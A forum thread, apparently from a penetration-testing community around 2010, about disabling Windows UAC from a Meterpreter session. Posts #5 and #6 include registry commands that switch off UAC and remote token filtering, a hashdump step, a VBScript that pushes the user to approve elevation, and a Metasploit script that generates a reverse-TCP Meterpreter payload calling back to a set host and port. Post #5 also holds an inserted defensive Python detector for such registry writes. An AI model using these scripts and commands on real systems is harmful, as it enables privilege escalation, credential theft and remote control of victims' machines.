
Thread: how to disable UAC or user access control

  1. #1
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    how to disable UAC or user access control

    This isn't anything crazy, but it uses only Metasploit scripts and no external sources, which is cool.

    Scripts used in this video:
    Bash | # $Id: killuac.rb spudgunman $ # # Meterpreter s - Getcountermeasure v2 script

    http://www.backtrack-linux.org/forum...tml#post182720


    I also found this information later on after all this...
    http://www.pretentiousname.com/misc/...t2.html#videos
    Last edited by spudgunman; 12-05-2010 at 02:23 AM.

  2. #2
    Member
    Join Date
    Jun 2009
    Posts
    74

    Re: how to disable UAC or user access control

    I'm assuming that you own/operate the machine in question. If so, just turn it off. If not, you need a remote registry injection. The key you want is going to be EnableLUA (DWORD, value of 0 obviously) in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System

  3. #3
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Re: how to disable UAC or user access control

    Yeah, this is all lab work in VMware, and to help quantify that I am not a 100% nube: my purpose for this is that I just rebuilt the getcountermeasure script (http://www.backtrack-linux.org/forum...tml#post182720) and I want to try and improve it more, to add functionality to disable UAC with my new rewrite of this script. And sure... it works if you manually turn it off, but that defeats the purpose of my inquiry.

    You can't inject that key unless you have UAC disabled or elevated permissions, so you can't change that key when UAC is enabled.

    So I am looking for how you create a package that will socially engineer the user to click "allow" on UAC to inject that code and disable UAC, or just install an msf service as SYSTEM, for example, with the same social exploit of clicking allow (much like a software install would do). Or is there any way to disable UAC with a script? (I tried with a VBScript with SendKeys, but it turns out UAC will ignore SendKeys, doh.)
    Last edited by spudgunman; 12-01-2010 at 05:05 PM.

  4. #4
    Member
    Join Date
    Jun 2009
    Posts
    74

    Re: how to disable UAC or user access control

    Try this on for size:

    Bypassing UAC with User Privilege under Windows Vista/7 · Technology Articles

    The exploit was known as of 11/27, but I highly doubt it's been addressed and if it has, I suspect there are plenty of vulnerable systems still out there.

    If you want it to work for you for POC you will need to make sure that you have a vulnerable kernel (specifically win32k.sys).

  5. #5
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Re: how to disable UAC or user access control

    Thanks, will check that out now.. Using VBS to elevate and install a backdoor gets me this effect.. damn, UAC appears to be blocking even SYSTEM from having fun??! Is this anyone else's experience?

    Code:
    meterpreter > sysinfo
    Computer: WIN-MSUB6TKFKFA
    OS      : Windows 7 (Build 7600, ).
    Arch    : x86
    Language: en_US
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter > migrate 467
    
    meterpreter > hashdump
    just another way to do the same things this can be done a lot of ways...
    meterpreter > shell
    Process 268 created.
    Channel 10 created.
    Microsoft Windows [Version 6.1.7600]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Windows\system32>whoami
    whoami
    nt authority\system
    
    C:\Windows\system32>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    The operation completed successfully.
    Update:
    After checking out that link.. interesting, no need for the user to click "hack me please". I will check this out in more detail.

    BTW, my elevation script is as follows... the only downside is UAC asks if "wscript host" can have rights... I suppose you could also do this with MSI or the Nullsoft installer.
    Code:
    If WScript.Arguments.length =0 Then
      'rerun the script with elevated UAC and prevent a loop
      Set objShell = CreateObject("Shell.Application")
      objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & " noloop", vbNullString, "runas"
    Else
      Set objShell = WScript.CreateObject("WScript.Shell")
      Set objFSO = CreateObject("Scripting.FileSystemObject")
      'locate the current path of the script
      strPath = Wscript.ScriptFullName
      Set objFile = objFSO.GetFile(strPath)
      strFolder = objFSO.GetParentFolderName(objFile)
      'script to run in elevated UAC here
      objShell.Run(strFolder & "\" & "backup.exe")
    End If

    After some thinking on this... we then need to patch UAC and reboot the box...
    Again, this can be done any way.. just using DOS to keep it simple.
    Code:
    C:\>whoami
    whoami
    nt authority\system
    
    C:\>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    The operation completed successfully.
    
    C:\>C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    The operation completed successfully.
    
    C:\>shutdown /l /f
    shutdown /l /f
    
    C:\>[*] Meterpreter session 2 closed.  Reason: Died
    Any thoughts on how to do (all of) this better? (The attack, not the reg edits.. I will eventually .rb script that stuff.)
    Last edited by spudgunman; 12-04-2010 at 05:36 AM.
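    The two registry values that post #2 and post #5 change (EnableLUA set to 0 and LocalAccountTokenFilterPolicy set to 1, both under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System) are exactly what a defender wants to alert on, since either write, by reg.exe or anything else, is a loud signal that UAC is being switched off. The following is an added example, not code from this thread, from Metasploit or from the getcountermeasure script: a small Python detector that scans registry "value set" records and flags writes that move a UAC policy value to its weak setting, while ignoring hardening writes (EnableLUA back to 1) and unrelated keys. The pipe-delimited record format, the field names and the sample events are constructed for the example, loosely modelled on Sysmon Event ID 13; ConsentPromptBehaviorAdmin is included as a third standard UAC value to watch, beyond the two the thread mentions. Matching is case-insensitive because registry paths are, and post #5 writes the key once as "Policies\system".

```python
"""Flag registry writes that weaken UAC in Sysmon-style 'value set' records.

Added example, not from the thread or Metasploit. The record format, field
names and sample events are constructed, loosely modelled on Sysmon Event ID 13.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# The key the thread's reg.exe commands write to. Registry paths are
# case-insensitive, so all comparisons below use casefold().
UAC_POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# value name (casefolded) -> (value that weakens UAC, why it matters)
UAC_WEAKENING: Dict[str, Tuple[int, str]] = {
    "enablelua": (0, "UAC disabled entirely (effective after the next logoff/reboot)"),
    "localaccounttokenfilterpolicy": (1, "remote token filtering off: local admins get full tokens over the network"),
    # not in the thread; the standard third value to watch (silent elevation for admins)
    "consentpromptbehavioradmin": (0, "administrators elevate without any consent prompt"),
}

DWORD_RE = re.compile(r"^DWORD \((0x[0-9A-Fa-f]{1,8})\)$")


@dataclass
class Alert:
    value_name: str
    new_value: int
    image: str
    user: str
    reason: str


def parse_record(line: str) -> Dict[str, str]:
    """Split 'Field=value|Field=value' into a dict (values may themselves contain '=')."""
    rec: Dict[str, str] = {}
    for field in line.strip().split("|"):
        if "=" in field:
            name, value = field.split("=", 1)
            rec[name.strip()] = value.strip()
    return rec


def check_record(rec: Dict[str, str]) -> Optional[Alert]:
    """Return an Alert if this record sets a UAC policy value to its weak setting."""
    if rec.get("EventType") != "SetValue":
        return None
    key, sep, value_name = rec.get("TargetObject", "").rpartition("\\")
    if not sep or key.casefold() != UAC_POLICY_KEY.casefold():
        return None
    expected = UAC_WEAKENING.get(value_name.casefold())
    if expected is None:
        return None
    weak_value, reason = expected
    match = DWORD_RE.match(rec.get("Details", ""))
    if match is None or int(match.group(1), 16) != weak_value:
        return None  # non-DWORD data, or a hardening write such as EnableLUA back to 1
    return Alert(value_name, weak_value, rec.get("Image", "?"), rec.get("User", "?"), reason)


def scan(lines: List[str]) -> List[Alert]:
    """Run every record through check_record and collect the alerts in order."""
    alerts: List[Alert] = []
    for line in lines:
        alert = check_record(parse_record(line))
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample events; the first two mirror the reg.exe commands in post #5.
SAMPLE_EVENTS = [
    r"EventType=SetValue|UtcTime=2010-12-04 05:30:01.123|ProcessId=268|Image=C:\Windows\System32\reg.exe|User=NT AUTHORITY\SYSTEM|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA|Details=DWORD (0x00000000)",
    r"EventType=SetValue|UtcTime=2010-12-04 05:30:02.456|ProcessId=268|Image=C:\Windows\System32\reg.exe|User=NT AUTHORITY\SYSTEM|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\LocalAccountTokenFilterPolicy|Details=DWORD (0x00000001)",
    # an admin re-enabling UAC: same value name, hardening direction, no alert
    r"EventType=SetValue|UtcTime=2010-12-04 06:00:00.000|ProcessId=1200|Image=C:\Windows\regedit.exe|User=LAB\admin|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA|Details=DWORD (0x00000001)",
    # unrelated autorun write under a different key: ignored
    r"EventType=SetValue|UtcTime=2010-12-04 06:01:00.000|ProcessId=1300|Image=C:\Windows\System32\msiexec.exe|User=LAB\admin|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater|Details=C:\Program Files\Updater\upd.exe",
    r"EventType=SetValue|UtcTime=2010-12-04 06:02:00.000|ProcessId=1400|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|User=LAB\admin|TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin|Details=DWORD (0x00000000)",
]


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"ALERT {a.value_name}={a.new_value} by {a.user} via {a.image}: {a.reason}")
```

    On the sample events the detector raises three alerts (EnableLUA, LocalAccountTokenFilterPolicy, ConsentPromptBehaviorAdmin) and stays quiet on the re-enable and the autorun write. In practice the same check sits behind a SIEM rule keyed on the Policies\System path; the write by NT AUTHORITY\SYSTEM from reg.exe, as in the transcript above, is the pattern worth paging on.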

  6. #6
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Re: how to disable UAC or user access control

    To keep things clean, here is the last post in a script:

    Code:
    # $Id: killuac.rb spudgunman $
    #
    # Meterpreter script to prompt for permissions to run in elevated mode and then call home
    # some code pulled from the persistence.rb script
    # Script by Kelly Keeton<kellykeeton [at] hotmail>
    # Version: 0.5
    #
    # Default parameters
    #
    rhost = "192.168.254.129"
    rport = 31337
    payload = "windows/meterpreter/reverse_tcp"
    ##
    
    tempdir = client.fs.file.expand_path("%TEMP%")
    payloadfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
    
    # String#scan returns an array, which is truthy even when empty, so the
    # original "unsupported if not platform" check could never fire; match directly.
    unsupported unless client.platform =~ /win32|win64/
    
    print_status("Creating a payload to run elevated UAC: LHOST=#{rhost} LPORT=#{rport}")
    pay = client.framework.payloads.create("#{payload}")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    
    payloadvbs = ::Msf::Util::EXE.to_win32pe_vbs(client.framework, raw, {:persist => true, :delay => 5})
    print_status("Payload script is #{payloadvbs.length} bytes long")
    
    uacvbs = "
    If WScript.Arguments.length =0 Then
      Set objShell = CreateObject(\"Shell.Application\")
      objShell.ShellExecute WScript.FullName, WScript.ScriptFullName & \" noloop\", vbNullString, \"runas\"
    Else
      Set objShell = WScript.CreateObject(\"WScript.Shell\")
      Set objFSO = CreateObject(\"Scripting.FileSystemObject\")
      strPath = Wscript.ScriptFullName
      Set objFile = objFSO.GetFile(strPath)
      strFolder = objFSO.GetParentFolderName(objFile)
      tmp = \"wscript \" & Chr(34) & \"#{payloadfile}\" & Chr(34)
      objShell.Run(tmp)
    End If"
    #
    # Upload to the filesystem
    #
    elevationfile = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
    print_status("UAC elevation script written to #{elevationfile}")
    fd = client.fs.file.new(elevationfile, "wb")
    fd.write(uacvbs)
    fd.close
    
    print_status("payload script written to #{payloadfile}")
    fd = client.fs.file.new(payloadfile, "wb")
    fd.write(payloadvbs)
    fd.close
    #
    # Execute the script
    #
    proc = session.sys.process.execute("wscript \"#{elevationfile}\"", nil, {'Hidden' => false})
    print_status("Script executed with PID #{proc.pid}")
    #EOF
    I also updated the getcountermeasure script to properly kill UAC on Windows 7 (didn't test Vista):

    http://www.backtrack-linux.org/forum...tml#post182720



    MOD: can you move this to Experts (or wherever you see fit), as this is no longer an "I'm stuck" thread.
    Last edited by spudgunman; 12-04-2010 at 08:27 AM.
